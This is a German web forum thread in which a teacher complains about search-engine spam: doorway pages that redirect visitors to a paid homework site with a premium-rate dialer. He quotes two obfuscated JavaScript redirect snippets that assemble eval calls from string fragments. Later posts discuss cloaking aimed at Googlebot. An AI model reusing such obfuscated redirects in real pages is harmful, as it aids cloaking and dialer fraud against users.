Mathias Bigge: Abwärtstrend bei Google

4 69

Abwärtstrend bei Google

Mathias Bigge
  • meinung
  1. -1
    Sven (κ)
    1. 0
      Bio
      1. 0
        L00NIX
        1. 0
          dedlfix
      2. 1
        N₂O
    2. 0
      TomIRL
    3. 0
      Mathias Bigge
      1. 0
        wahsaga
        1. 0
          Christian Kruse
  2. 0
    L00NIX
  3. 0
    TomIRL
    1. 0
      Mathias Bigge
      1. 0
        TomIRL
  4. 0
    Andreas Lindig
  5. 0
    dedlfix
    1. 0
      dedlfix
    2. 0
      Mathias Bigge
      1. 0
        dedlfix
        1. 0
          Mathias Bigge
      2. 0
        Andreas Lindig
  6. 0
    Ingo Turski
    1. 0
      Ludger
      1. 0
        Ingo Turski
  7. 0
    Ashura
    1. 0
      Mathias Bigge
      1. 0

        Ergänzung - Fastbot völlig zugespammt

        Mathias Bigge
        1. 0
          Ashura
  8. 4
    Alexander
  9. 0
    Axel Richter
    1. 0
      Mathias Bigge
  10. 0
    Axel Richter
    1. 0
      Mathias Bigge
      1. 0
        Axel Richter
        1. 0
          Mathias Bigge
          1. 0
            Axel Richter
            1. 0
              Mathias Bigge
        2. 0
          dedlfix
          1. 0
            Axel Richter
            1. 0
              unknown
              1. 0
                Mathias Bigge
                1. 0
                  unknown
                  1. 0
                    unknown
                    1. 0
                      Der Martin
                      1. 0
                        Ashura
                        1. 0
                          Der Martin
                          1. 0
                            unknown
                            1. 0
                              Der Martin
          2. 0
            Ingo Turski
            1. 0
              Axel Richter
              1. 0
                Mathias Bigge
                1. 0
                  Axel Richter
              2. 0
                Ingo Turski
                1. 0
                  Mathias Bigge
                  1. 0
                    Ingo Turski
  11. 0
    unknown
    1. 0
      Mathias Bigge
    2. 0
      wahsaga
  12. 0
    Struppi
  13. 0

    Vorschlag für ein Gegenkonzept

    wahsaga
    1. 0
      Christian Kruse
      1. 0
        wahsaga
        1. 0
          Christian Kruse
      2. 0
        Mathias Bigge
        1. 0
          Christian Kruse
      3. 0
        MudGuard
        1. 0
          Christian Kruse
          1. 0
            MudGuard
            1. 0
              Christian Kruse

Hi alle,

meiner Meinung nach haben sich die Suchergebnisse von google in der letzten Zeit so dramatisch verschlechtert, dass ich überlege auf eine andere Suchmaschine umzusteigen.

Die Situation

Ich suche häufig aktuelles Material für den Unterricht. Meine Fächer sind Deutsch, Gesellschaftslehre und Philosophie. Bei meinen Recherchen sind immer häufiger die ersten Ergebnisseiten systematisch zugespammt, vor allem von der Site http://www.hausaufgaben.de, die ich bewusst hier nicht verlinke. Ein Aufruf aus Deutschland per Dialer kostet 29,95 Euro aus Deutschland.

Konkretes Beispiel

Recherche: Parabel Interpretation

1. Dutzende leerer Seiten, die eine Weiterleitung, meist per JS enthalten, z.B.:

  • http://www.referat-wissenschaft.de/stadt/tolstoi-parabel-interpretation.htm
  • http://www.woortmanactiefkamperen.nl/bfafcaebbc-393.html
  • www.referat-wissenschaft.de/ stadt/tolstoi-parabel-interpretation.htm
  • www.referate-versicherungen.de/ frauen/parabel-interpretation.htm

Das Script:

_________________________________________________
<script>
<!--
function red()
{
code1=("win");
five=("', '', 'toolbar=0,location=0,directories=0,status=0,men");
third=("pe");
part2=("dow.o");
part7=("ument.lo");
four=("n('http://www.schulstadt.de/?pid=sla-10040&tarif=drop");
part6=("ubar=0,scrollbars=1,resizable=0,width=800,height=600,screenX=0,screenY=0');window.focus();doc");
part8=("cation='http://www.hausaufgaben.de/affiliate/?layout=7&provider=mp&payment=4&pid=hun-10051&mp_design=hun-1&mp_layout=hausaufgaben2&mp_theme=style1&mp_land=de&mp_exename=hausaufgaben';");
eval(code1+part2+third+four+five+part6+part7+part8);
}
red();
// -->
</script>

2. Seiten, die den gleichen Inhalt und Dialer präsentieren wie www.hausaufgaben.de

  • http://www.emancipatiepolitiek.nl/acbcaaaa-68.html

3. Seiten mit endlosen Wortlisten und folgendem Script:

<script language="javascript">
<!--
var z = parent.location.hostname;
var dom = "http://" + z + "/default.html";

var u="ace(do";var a="wind";var i="catio";
var e="ow.lo";var o="n.repl";var c="m)";
eval(a+e+i+o+u+c);
//-->
</script>

z.B. http://www.b-haus.de/mathe-pie/hausaufgaben-seminar-arbeiten.html
____________________________________________________

1. Bitte unterstützt mich und meldet solche Dinge an Google.
2. Gibt es eurer Erfahrung nach gute Alternativen zu Google, die mit diesem Spammer fertig werden?
3. Kann man rechtlich dagegen vorgehen?

Viele Grüße
Mathias Bigge

  1. Hi Mathias,

    meiner Meinung nach haben sich die Suchergebnisse von google in der letzten Zeit so dramatisch verschlechtert, dass ich überlege auf eine andere Suchmaschine umzusteigen.

    meinst du, da ist es besser? Immerhin ist Google imho die Suchmaschine mit den meisten indexierten Seiten.

    Ich suche häufig aktuelles Material für den Unterricht. Meine Fächer sind Deutsch, Gesellschaftslehre und Philosophie.

    Lehrer oder Schüler? ;)

    Bei meinen Recherchen sind immer häufiger die ersten Ergebnisseiten systematisch zugespammt, vor allem von der Site http://www.hausaufgaben.de, die ich bewusst hier nicht verlinke. Ein Aufruf aus Deutschland per Dialer kostet 29,95 Euro aus Deutschland.

    jo...

    Das Script:
    [...]
    </script>

    ziemlich blödsinnige JavaScripte, was soll dieses Variablenrumgefummel bringen? Haben die sonst Angst, Suchmaschinen könnten "dahinter" kommen!?

    1. Bitte unterstützt mich und meldet solche Dinge an Google.

    Wie? Was soll das bringen? Es gibt tausende solcher Seiten, und ich bin sicher, Google weiss von deren Existenz.

    1. Gibt es eurer Erfahrung nach gute Alternativen zu Google, die mit diesem Spammer fertig werden?

    glaube ich nicht.

    1. Kann man rechtlich dagegen vorgehen?

    glaube ich nicht.

    cu,

    Sven

    --
    SvenK | SelfCode: Encode/Decode | Firefox | Mozilla | Opera | Gentoo Linux
    SelfCode | ie:% fl:( br:^ va:) ls:& fo:) rl:( n4:( ss:) de:> js:| ch:° mo:} zu:}
    1. Sup!

      meinst du, da ist es besser? Immerhin ist Google imho die Suchmaschine mit den meisten indexierten Seiten.

      Das Verb zu "Index" ist "indizieren". "Indexieren" ist Blödsinn bzw. zumindest ganz mieser Stil.

      Gruesse,

      Bio

      --
      Keep your friends close, but your enemies closer!
      1. Das Verb zu "Index" ist "indizieren". "Indexieren" ist Blödsinn
        bzw. zumindest ganz mieser Stil.

        Soweit ich weiß, ist es neue deutsche Rechtschreibung, siehe auch
        http://www.duden.de.

        Genauso gibt es inzwischen Implementation (bisher nur:
        Implementierung) und allokieren (bisher: allozieren).

        Von Stil zu sprechen ist Blödsinn, denn vorher war es schlicht
        falsch! :-)

        Gruß
        L00NIX

        1. Das Verb zu "Index" ist "indizieren". "Indexieren" ist Blödsinn
          bzw. zumindest ganz mieser Stil.

          Soweit ich weiß, ist es neue deutsche Rechtschreibung, siehe auch
          http://www.duden.de.

          Im Duden vom VEB Bibliographisches Institut Leipzig mit Redaktionsschluss vom 31.Januar 1984 ist das Verb zu Index indexieren ("einen Index anlegen"). Dort steht kein Hinweis auf indizieren.
          Indizieren taucht unter Indiz auf mit der Bedeutung "anzeigen, auf etwas hinweisen; auf den Index setzen"

      2. Hallo Bio,

        Das Verb zu "Index" ist "indizieren". "Indexieren" ist Blödsinn bzw. zumindest ganz mieser Stil.

        indizieren (*) != indexieren (**)

        (*) in·di'zie·ren 1. auf etwas hinweisen, etwas nahelegen, ein → Indiz darstellen 2. MEDIZIN auf Grund einer Diagnose eine bestimmte Behandlung angezeigt erscheinen lassen 3. auf den → Index (II) setzen, verbieten (Buch, Schriften) 4. gleichartige wissenschaftliche Kennzeichnungen mit → Indizes (III 2) versehen 5. LINGUISTIK → Homographen mit → Indizes (III 3) versehen

        (**) in·de'xie·ren 1. einen → Index (I 1) erstellen 2. kennzeichnen, einen → Index (I 3) vergeben

        (lt. Langenscheidt Fremdwörterbuch)

        Gruß
        Lachgas

        --
        Keine Verbesserung ist zu klein oder geringfügig, als dass man sie nicht durchführen sollte. (Adorno)
    2. Moin,

      Wenn man keine Ahnung hat, dann sollte man zunächst einmal lesen und nicht Kommentare sinnlos abgeben.
      Ich bin mir zum Beispiel sehr sicher, dass Du weder diese Seite hier:
      http://www.google.de/intl/de/webmasters/guidelines.html
      Noch diese Seite hier:

      http://www.google.de/webmasters/spamreport.html
      kennst.
      Und wenn Du ein bißchen öfter im Forum wärst, dan würdest Du wissen warum man Mattes nicht über den Sinn und Unsinn bestimmter JS oder sonstiger Geschichten aufklären muß, und schon gar nicht mit Pseudowissen.

      Viel Spaß beim freundlichen mitlesen hier.

      TomIRL

    3. Hi Sven,

      Lehrer oder Schüler? ;)

      Lehrer, Du Torfnase, oder kennst Du Schüler, die nur drei Fächer haben *g*

      Ein recht pomadiges Posting hast Du da hingelegt, Pursche!

      Viele Grüße
      Mathias Bigge

      1. hi,

        Lehrer oder Schüler? ;)
        Lehrer, Du Torfnase, oder kennst Du Schüler, die nur drei Fächer haben *g*

        Studenten ...?

        gruß,
        wahsaga

        --
        "Look, that's why there's rules, understand? So that you _think_ before you break 'em."
        1. 你好 wahsaga,

          Lehrer oder Schüler? ;)
          Lehrer, Du Torfnase, oder kennst Du Schüler, die nur drei Fächer haben
          *g*

          Studenten ...?

          Wohl kaum.

          再见,
          CK

  2. Hallo.

    Das genannte Problem ist _wirklich_ ein Problem, lässt sich aber
    teilweise noch durch "bessere" Suchwörter abmildern. Unter besser
    verstehe ich jetzt eher unpopuläre Wörter, nach denen man eben eher
    nicht suchen würde, die aber schon etwas mit dem Thema zu tun haben.

    Es gibt soweit ich weiß auch von Menschen gepfelgte Suchmaschinen,
    d.h. also, dass die Links "von Hand" zusammengestellt werden.

    Nachteil: Quantität, "Zensur"
    Vorteil : Qualität

    Ich selbst nutze aber ausschließlich Google und kenne keine dieser
    genannten Suchmaschinen außer dem Web Directory
    (google->Verzeichnis->Kathegorie->...).

    Gruß
      L00NIX

  3. Moin Mattes

    1. Bitte unterstützt mich und meldet solche Dinge an Google.

    ja.. Ich melde pro Woche ca. 2-3 Seiten bei google.. Bin aber teilweise umgestiegen :-)

    1. Gibt es eurer Erfahrung nach gute Alternativen zu Google, die mit diesem Spammer fertig werden?

    http://seekport.de liefert inzwischen recht brauchbare
    Ergebnisse.
    Als Beispiel, deine Suchanfrage http://seekport.de/q?query=Parabel+Interpretation&submit=Suchen&domain=all
    Und alles wird gut..
    Ich glaube schon die ersten treffer sind hganz brauchbar...

    1. Kann man rechtlich dagegen vorgehen?

    Ich denke nein, wenn ich aber mal ganz reich bin werde ich meinen Anwalt mit einer Prüfung beauftragen.
    Viele Grüße aus Berlin vom Tom

    1. Hi TomIRL,

      1. Bitte unterstützt mich und meldet solche Dinge an Google.
        ja.. Ich melde pro Woche ca. 2-3 Seiten bei google.. Bin aber teilweise umgestiegen :-)

      Ich hab's mit Metager versucht, mit Alta Vista und MSN, zum Teil mit besseren Resultaten, zum Teil mit anderen Ärgernissen.

      gute Alternativen zu Google
      http://seekport.de liefert inzwischen recht brauchbare Ergebnisse.

      Ich hab's mir mal angeguckt, eindeutig weniger Spam, aber auch weniger Treffer. Insgesamt aber nicht schlecht.

      1. Kann man rechtlich dagegen vorgehen?
        Ich denke nein, wenn ich aber mal ganz reich bin werde ich meinen Anwalt mit einer Prüfung beauftragen.

      *g*
      Anscheinend kriegen sie schon irgendwoher Druck, denn sie haben inzwischen unten auf der Seite eine Warnung, die Seite sei für Kinder und Jugendliche nicht geeignet.

      Viele Grüße
      Mathias Bigge

      1. Moin,

        gute Alternativen zu Google
        http://seekport.de liefert inzwischen recht brauchbare Ergebnisse.
        Ich hab's mir mal angeguckt, eindeutig weniger Spam, aber auch weniger Treffer. Insgesamt aber nicht schlecht.

        Wie definierst Du Treffer?
        Wenn Du Anzahl der gefunden Suchbegriffe meinst, dann ist Deine Zählweise ohnehin in Frage zu stellen.
        Du weißt ja nicht wieviel Spam dabei ist.
        Für mich gibts es nur ein Kriterium, und zwar ob ich die gesuchte Information schnell finde.
        Ist das der Fall, kann ich mit nur 10 Treffern durchaus gut leben.

        Viele Grüße TomIRL

  4. Hallo Mathias,

    vor allem von der Site http://www.hausaufgaben.de,...

    ja, eine Seuche. Ähnlich ist Lehrstellen.de

    1. Kann man rechtlich dagegen vorgehen?

    wohl kaum. Google wird auch in Zukunft nicht mehr viel Interesse an guten Suchergebnissen haben - die haben das große Geschäft entdeckt. Da hat sich die Konkurrenz wohl nicht rechtzeitig vorbereitet.

    Gruß, Andreas

    --
    SELFFORUM - hier werden Sie geholfen,
    auch in Fragen zu richtiges Deutsch
    1. Kann man rechtlich dagegen vorgehen?

    Auf welcher Grundlage? Es bestehen keinerlei Verträge zwischen dir und Google und auch nicht zwischen Google und den Spamern und zwischen dir und den Spamern hoffentlich auch nicht.

      1. Kann man rechtlich dagegen vorgehen?

      Auf welcher Grundlage? Es bestehen keinerlei Verträge zwischen dir und Google und auch nicht zwischen Google und den Spamern und zwischen dir und den Spamern hoffentlich auch nicht.

      Wahrscheinlich ist meine Aussage juristisch nicht wasserdicht. Bei der Nutzung von Google wird sicher sowas ähnliches wie ein Vertrag zustande kommen. Jedoch gibt es laut BGB (den passenden §en finde ich momentan nicht) kein einklagbares Recht auf irgendeine Leistung oder Haftung bei falschem Gebrauch wenn eine Sache kostenlos zur Verfügung gestellt wird. Es sei denn Google macht das vorsätzlich...

      deldfix

    1. Hi dedlfix,

      1. Kann man rechtlich dagegen vorgehen?
        Auf welcher Grundlage? Es bestehen keinerlei Verträge zwischen dir und Google

      Google will ich durch Pressearbeit bewegen, etwas zu tun. Rechtlich könnte der Dialer mit seinen heftigen Gebühren ein Ansatzpunkt sein, dachte ich.

      Viele Grüße
      Mathias Bigge

        1. Kann man rechtlich dagegen vorgehen?
          Auf welcher Grundlage? Es bestehen keinerlei Verträge zwischen dir und Google
          Google will ich durch Pressearbeit bewegen, etwas zu tun.

        Prizipiell begrüße ich jeden Schritt, den Google unternimmt um dem Problem die Stirn zu bieten. Ob sich dadurch die Spamer beeindrucken lassen, und ob die Problematik von Otto-Normal-Bürger verstanden wird, wage ich zu skeptisch zu betrachten. An was dachte denn Google dabei? Gibt's da was genaueres dazu zu lesen?

        Rechtlich könnte der Dialer mit seinen heftigen Gebühren ein Ansatzpunkt sein, dachte ich.

        Ja. Nein. Das wird dir nicht viel nützen. Du kannst da maximal unter bestimmten Umständen (gesetzesunkonformer Dialer, Sittenwidrigkeit...) die Zahlung der dir gestellten Rechnung verweigern. Unter diesem Vorsatz so einen Dialer anwenden und mit dem dabei entstehenden Traffic den Anbieter zu schädigen, sehe ich ebenfalls keine Erfolgschancen.
        Auf Computersabotage klagen wird auch nichts werden.

        Sollte es dennoch gelingen einen Anbieter wegzuklagen, so stehen noch viele weitere auf der Matte, die sich mit völlig gesetzlich legalen Mitteln an die oberen Plätze drängeln.

        Eine Lösung für die Problematik habe ich auch keine. Mit dubiosen Vorgehensweisen den Teufel mit dem Belzebub austreiben zu wollen, heizt nur das Wettrüsten noch mehr an und erzeugt andere ungewollte Seiteneffekte (noch mehr Müll auf den Leitungen, Traffic bei unschuldigen Providern, Kosten die umgelegt werden).
        Ich versuche alle Seiten zu beobachten, dadurch meine Medienkompetenz zu verbessern und den Spam aktiv oder mental auszublenden.

        1. Hi dedlfix,

          Ich versuche alle Seiten zu beobachten, dadurch meine Medienkompetenz zu verbessern und den Spam aktiv oder mental auszublenden.

          Deine Position ist für mich nachvollziehbar, zum Teil sehe ich das ähnlich. Mir fällt halt auf, dass der oft kritisierte Suchmaschinenspam, vor dem auf den Google-Seiten und auch hier immer wieder gewarnt wird, perfekt funktioniert. Besonders sind das die Aktivitäten dubioser kostenpflichtiger Hausaufgaben-, Arbeitsmarkt und KFZ-Seiten, aber das Muster wird schnell Schule machen, wenn man nicht aktiv dagegen vorgeht.

          Viele Grüße
          Mathias Bigge

      1. Rechtlich könnte der Dialer mit seinen heftigen Gebühren ein Ansatzpunkt sein, dachte ich.

        hmm..., die halten sich an die neue Verordnung, nach der man "ok" eintippen muß. Etwas fragwürdig finde ich, daß auf der Dialerseite nichts mehr von den Kosten steht.

        Witzig finde ich auf der Hauptseite ja dies: "Das Angebot ist nicht geeignet für Kinder und Jugendliche unter 18 Jahren.(29,95€/call aus Deutschland)". Ja, für wen sind Hausaufgaben denn gedacht?

        Gruß, Andreas

        --
        SELFFORUM - hier werden Sie geholfen,
        auch in Fragen zu richtiges Deutsch
  5. Hi,

    meiner Meinung nach haben sich die Suchergebnisse von google in der letzten Zeit so dramatisch verschlechtert

    es gab mit dem Aufkommen vom MSN beta einen deutlichen Sprung bei google. Seiten, die aus dem Index entfernt waren, wurden wieder aufgenommen. Damit hatte google quantitativ die Nase vorn; mir scheint, daß denen das wichtiger als die Qualität der Suchergebnisse war.

    freundliche Grüße
    Ingo

    1. Hi,

      es gab mit dem Aufkommen vom MSN beta einen deutlichen Sprung bei google. Seiten, die aus dem Index entfernt waren, wurden wieder aufgenommen. Damit hatte google quantitativ die Nase vorn; mir scheint, daß denen das wichtiger als die Qualität der Suchergebnisse war.

      ich habe auch den Eindruck. Aber wie kann es sein, dass die Quantitaet hier ueber die Qualitaet zu siegen scheint?

      Sind die Abnehmer etwa so doof?

      Gruss,
      Ludger

      1. Hi,

        Sind die Abnehmer etwa so doof?

        zumindest scheint google dies anzunehmen. ;-)

        freundliche Grüße
        Ingo

  6. Hallo Mathias.

    1. Gibt es eurer Erfahrung nach gute Alternativen zu Google, die mit diesem Spammer fertig werden?

    Erwähnenswert ist hier fastbot>>. Sicher, der Index ist nicht so umfangreich wie bei Google, aber was nicht ist, kann ja noch werden.

    Zudem sind die folgenden Links interessant, welche sich unter _jedem_ Suchergebnis finden:

    [anonym öffnen] [spam melden] [anhören]

    Die Funktionen sprechen meiner Meinung nach für sich...

    Gruß, Ashura

    --
    Selfcode: sh:( fo:) ch:? rl:( br:^ n4:& ie:{ mo:) va:) de:> zu:) fl:( ss:( ls:# js:|
    1. Hi Ashura,

      Erwähnenswert ist hier fastbot>>. Sicher, der Index ist nicht so umfangreich wie bei Google, aber was nicht ist, kann ja noch werden.

      Das erste Ergebnis meiner Testabfrage: Eine getarnte Seite von www.hausaufgaben.de... Hab mal die Spamtaste geklickt, mal beobachten, ob sie was machen.

      Die Funktionen sprechen meiner Meinung nach für sich...

      Ich werde das mal beobachten und dann melden.

      Viele Grüße
      Mathias Bigge

      1. Hi Mathias,

        auf meine Testanfrage "Parabel Interpretation" waren die ersten 6 Links getarnte Links von Hausaufgaben.de......

        Viele Grüße
        Mathias Bigge

        1. Hallo Mathias.

          auf meine Testanfrage "Parabel Interpretation" waren die ersten 6 Links getarnte Links von Hausaufgaben.de......

          Oha!

          Leider kann ich nicht sagen, wie schnell und in welchem Umfang der [spam melden] Dienst umgesetzt wird...

          Gruß, Ashura

          --
          Selfcode: sh:( fo:) ch:? rl:( br:^ n4:& ie:{ mo:) va:) de:> zu:) fl:( ss:( ls:# js:|
  7. Hi Mathias,

    diesen Trend habe ich leider auch festgestellt. In der Regel ist die erste Ergebnisseite bei allgemein gebräuchlichen Suchbegriffen nicht mehr zu gebrauchen.

    Ich weiss aber auch nciht, welche Suchmaschine bessere Ergebnisse liefert.
    Ab und an nutze ich http://www.alltheweb.com, aber die Ergebnisse sind auch nicht überragend.

    Daher gehe ich jetzt immer häufiger "back to roots", sprich zu Web-Verzeichnissen und weg von Volltextsuchmaschinen. Meine erste Anlaufstelle ist http://dmoz.org/.

    Aber ich weiss nicht so recht, wie es euch geht. Mir fällt es insgesamt immer schwerer, brauchbare Informationen aus dem Netz zu ziehen. Ich vermissen diese vielen, kleinen Privat-Sites, die von Menschen geschrieben wurden, die voller Euphorie für ihr Hobby waren. Diese Seiten waren aktuell, steckten voll wertvoller(!) Informationen. Die Betreiber standen auch immer mit Rat und Tat bei E-Mail-Kontakt zur Seite. Heute freue ich mich schon, wenn immerhin ein Autoresponder auf eine E-Mail-Anfrage antwortet...

    Heutzutage ist es auch oftmals so, dass viele Sites mit hohem technischen Aufwand erstellt werden, dann aber absterben, weil kein brauchbarer Content vorhanden ist ("Mehr Schein als Sein"). Gut, das bekommt man ja auch von unzähligen kommerziellen Sites vorgelebt...

    Vielleicht hat sich dies auch einfach verschoben. Weg von der eigenen Seite hin zu Foren und Boards.
    Das ist eigentlich nicht schlecht. Doch inzwischen ist das Web so groß geworden und die Anzahl an Postings so enorm geworden, dass es eigentlich nichts gibt, wasin Foren/Boards nicht gefunden werden kann.
    Aber genau hier liegt auch ein weitere Nachteil: Dieses Wissen ist unüberschaubar.
    "Newbies" (doofes Wort) fragen etwas, alte Hasen würgen dies sofot mit einem "Schau in Archiv" ab. Suche ich im Archiv, finde ich erstmal 30 Threads zu meiner Frage, aber auch jedesmal mit der doofen Anwort, dass die Frage schonmal gestellt worden ist.
    Wenn Werkzeuge zur Bewertung zur Verfügung stehen, um die Qualität von Postings zu bestimmen, wird dies oftmals auch persönlichen Rachfeldzügen missbraucht oder es wird einfach überzogen. In allen Boards, in denen ich mich so rumtreibe gibt es Bewertungsmöglichkeiten. Aber ich finde keine Postings mit nur zwei, drei Sternen. Nein, entweder haben sie fünf (="supertolles" Posting) oder garkeine (sprich: diese wurden nicht bewertet). Das hilft aucc nicht wirklich weiter...

    Nunja, das globale Dorf ist zu einer Metropole gewachsen. Mit allen Vor- und Nachteilen, die sich auch im echten Leben ergeben, wie z.B. Anonymität oder Unüberschaubarkeit.

    Das hört sich oben vielleicht alles etwa so an, dass "früher alles besser war". Das möchte ich so auch nicht sagen, aber es war zumindest einfacher an brauchbarer Informationen zu kommen. Und das vermisse ich am modernen Web.

    Viele Grüße...

    Alex :)

  8. Hallo,

    Recherche: Parabel Interpretation

    Probier mal:
    http://vivisimo.com/search?query=Parabel+Interpretation&v%3Asources=Web.

    Der Vorteil ist hier, dass die Ergebnisse in Clustern gruppiert werden.

    viele Grüße

    Axel

    1. Hi Axel,

      Recherche: Parabel Interpretation
      Probier mal:
      http://vivisimo.com/search?query=Parabel+Interpretation&v%3Asources=Web.

      Auch die sind mächtig von hausarbeiten.de zugespammt, aber immerhin sind doch ein paar interessante Resultate dabei, die die anderen nicht zeigen.

      Der Vorteil ist hier, dass die Ergebnisse in Clustern gruppiert werden.

      Wirklich ein interessantes Feature!

      Viele Grüße
      Mathias Bigge

  9. Hallo,

    meiner Meinung nach haben sich die Suchergebnisse von google in der letzten Zeit so dramatisch verschlechtert

    Das Schlimme ist, dass Google seine eigenen, eigentlich guten Grundsätze über Bord wirft, wenn es nur um genug Geld geht. Man kann eine noch so gute Suchstrategie haben, die ersten Einträge sind fast immer SPAM, wenn es nicht um technische Probleme geht. Das Internet als Wissensquelle geht so vor die Hunde. Beispiel:

    http://www.google.de/search?hl=de&as_qdr=all&q=Parabel+Interpretation+-hausa+-versicherung+-ok+-dial&btnG=Suche&meta=lr%3Dlang_de

    Frage an Google: Was hat www.woortmanactiefkamperen.nl hier auf den ersten Plätzen zu suchen?

    Wenn man Wissen sucht, kann man eigentlich guten Gewissens nur noch über die Wikipedias einsteigen.

    viele Grüße

    Axel

    1. Hi Axel,

      Das Internet als Wissensquelle geht so vor die Hunde. Beispiel:
      http://www.google.de/search?hl=de&as_qdr=all&q=Parabel+Interpretation+-hausa+-versicherung+-ok+-dial&btnG=Suche&meta=lr%3Dlang_de

      Genau sowas habe ich auch versucht und festgestellt, dass es nicht geht. Das sieht ja schon fast nach Absicht aus, oder?

      Wenn man Wissen sucht, kann man eigentlich guten Gewissens nur noch über die Wikipedias einsteigen.

      Die wirklich langsam zu einiger Qualität wachsen, schade, dass die manchmal so lahm angebunden sind.

      Viele Grüße
      Mathias Bigge

      1. Hallo,

        Genau sowas habe ich auch versucht und festgestellt, dass es nicht geht. Das sieht ja schon fast nach Absicht aus, oder?

        Ja, denn das Ergebnis widerspricht allem, was Google selbst über seine Suche behauptet.

        http://www.google.de/search?hl=de&q=Parabel+Interpretation+-ok&meta=
        bringt als ersten Treffer
        www.woortmanactiefkamperen.nl/bfafcaebbc-393.html

        1. Ist das ein Frameset völlig ohne noframes-Bereich.

        2. Steht in der Frameset-Seite _nur_
        <HTML>
        <HEAD>
        <TITLE>woortmanactiefkamperen.nl</TITLE>
        <META HTTP-EQUIV='PRAGMA' CONTENT='NOCACHE'>
        <META NAME='robots' content='NOINDEX, NOFOLLOW'>
        </HEAD>
        <FRAMESET ROWS='100%,*' FRAMEBORDER=0 BORDER=0 FRAMESPACING=0>
        <FRAME NAME='main' SRC='http://www.scenelink.biz/ha/' MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER=0>
        </FRAMESET>
        </HTML>
        Wo bitte ist da Parabel? Wo Interpretation?

        3. Auch in http://www.scenelink.biz/ha/ finden sich die Begriffe Parabel un Interpretation _nicht_, wohl aber ein ok.gif. Hatten wir ok nicht explizit ausgeschlossen?

        Folgerung: Die Seite _kann_ laut Google dort nicht als bester Treffer stehen. Warum steht sie dann dort? Weil man den PageRank eben _doch_ kaufen kann.

        viele Grüße

        Axel

        1. Hi Axel,

          Vorsicht, Vorsicht! So einfach, wie Du vermutest, ist es nicht, offensichtlich werden unter dem gleichen Link nach irgendeinem System verschiedene Seiten ausgeliefert und es kann sein, dass der Google-Bot etwas ganz anderes zu sehen bekommt.

          Genau sowas habe ich auch versucht und festgestellt, dass es nicht geht. Das sieht ja schon fast nach Absicht aus, oder?
          Ja, denn das Ergebnis widerspricht allem, was Google selbst über seine Suche behauptet.

          http://www.google.de/search?hl=de&q=Parabel+Interpretation+-ok&meta=
          bringt als ersten Treffer
          www.woortmanactiefkamperen.nl/bfafcaebbc-393.html

          1. Ist das ein Frameset völlig ohne noframes-Bereich.

          Bei mir liefert es jetzt eine Kopie der www.hausaufgaben.de-Startseite.

          1. Steht in der Frameset-Seite _nur_
            Wo bitte ist da Parabel? Wo Interpretation?

          Wie gesagt kann es sein, dass der Google-Bot mit System etwas ganz anderes zu sehen bekommt.

          1. Auch in http://www.scenelink.biz/ha/ finden sich die Begriffe Parabel un Interpretation _nicht_, wohl aber ein ok.gif. Hatten wir ok nicht explizit ausgeschlossen?

          Ja, offensichtlich sind andere Daten im Cache. Ich zitiere mal: "kafka parabel interpretation. euthanasie ethik - referat lexikon - biologie ... kosovo
          krieg! KAFKA PARABEL INTERPRETATION.? england geografie kafka ... " usw.

          Folgerung: Die Seite _kann_ laut Google dort nicht als bester Treffer stehen. Warum steht sie dann dort? Weil man den PageRank eben _doch_ kaufen kann.

          Das ist etwas zu voreilig geschlossen.

          Viele Grüße
          Mathias Bigge

          1. Hallo,

            1. Ist das ein Frameset völlig ohne noframes-Bereich.
              Bei mir liefert es jetzt eine Kopie der www.hausaufgaben.de-Startseite.

            Quelltext angesehen?

            Ja, offensichtlich sind andere Daten im Cache. Ich zitiere mal: "kafka parabel interpretation. euthanasie ethik - referat lexikon - biologie ... kosovo
            krieg! KAFKA PARABEL INTERPRETATION.? england geografie kafka ... " usw.

            Ja, eben. Woher kommen die? Laut Google wird so etwas, also das ständige Ändern des vollständigen Inhalts oder das Ausliefern spezieller Inhalte für den Googlebot, mit Rausschmiss bestraft. Offensichtlich aber nicht bei jedem.

            viele Grüße

            Axel

            1. Hi Axel,

              1. Ist das ein Frameset völlig ohne noframes-Bereich.
                Bei mir liefert es jetzt eine Kopie der www.hausaufgaben.de-Startseite.
                Quelltext angesehen?

              Natürlich. Oder glaubst Du, ich falle auf eine Weiterleitung rein *g*

              Ja, offensichtlich sind andere Daten im Cache. Ich zitiere mal: "kafka parabel interpretation. euthanasie ethik - referat lexikon - biologie ... kosovo
              krieg! KAFKA PARABEL INTERPRETATION.? england geografie kafka ... " usw.
              Ja, eben. Woher kommen die? Laut Google wird so etwas, also das ständige Ändern des vollständigen Inhalts oder das Ausliefern spezieller Inhalte für den Googlebot, mit Rausschmiss bestraft. Offensichtlich aber nicht bei jedem.

              Oder es ist für sie so ohne weiteres nicht feststellbar, wenn der Feind ein paar gute Informatiker beschäftigt...

              Viele Grüße
              Mathias Bigge

        2. Warum steht sie dann dort?

          Ich vermute, dass da jemand dem Google was anderes zu füttern gibt als dem Normal-Browser.

          Was verwendet Google für eine User-Agent-Kennung?

          Kann das mal jemand mit einem entsprechend konfigurierbaren Browser probieren?

            1. http://web-sniffer.net/?url=http%3A%2F%2Fwww.scenelink.biz%2Fha%2F&submit=Submit&http=1.1&gzip=yes&type=GET&ua=Googlebot

              Naja, der WebSniffer ist nicht gerade der hellste ;-) Geht man der Sache ein wenig auf den Grund kommt folgendes  heraus, was nicht weiter erstaunlich ist:

              http://www.hausaufgaben.de/webmaster/?action=home/information&provider=mp&pid=hausaufgaben-de&promo_pid=&promo_provider=&promo_payment=
              und
              http://www.hausaufgaben.de/affiliate/imprint.php

              Meiner Meinung nach ein Grund mehr für das liebheisen (<== den kannte ich noch nicht, sehr amüsant).

              cu
              unknown

              1. Hi unknown,

                Naja, der WebSniffer ist nicht gerade der hellste ;-) Geht man der Sache ein wenig auf den Grund kommt folgendes  heraus, was nicht weiter erstaunlich ist:

                So langsam wird es interessant.

                Meiner Meinung nach ein Grund mehr für das liebheisen (<== den kannte ich noch nicht, sehr amüsant).

                Bald habe ich genug zusammen für eine nette Pressemitteilung... Das könnte auch recht nett wirken...

                Viele Grüße
                Mathias Bigge

                1. Bald habe ich genug zusammen für eine nette Pressemitteilung... Das könnte auch recht nett wirken...

                  Das ist doch mal was. Für die Autoscout und Motoscout Geschichte (joboter) sind die hier u.a. verantwortlich: http://www.navigas.ch/html/navigas/fuer_firmen/index.html. Ist nicht die gesamte Seite, da Frames.

                  Und irgendwie kommt München ebenfalls mit ins Spiel, wenn man Impressum bei http://www.joboter.ch/kfz-markt/Roller_Haendler_Gebraucht_Dortmund.html
                  anklickt landet man dort:
                  http://www.myindex.de/impressum.html.

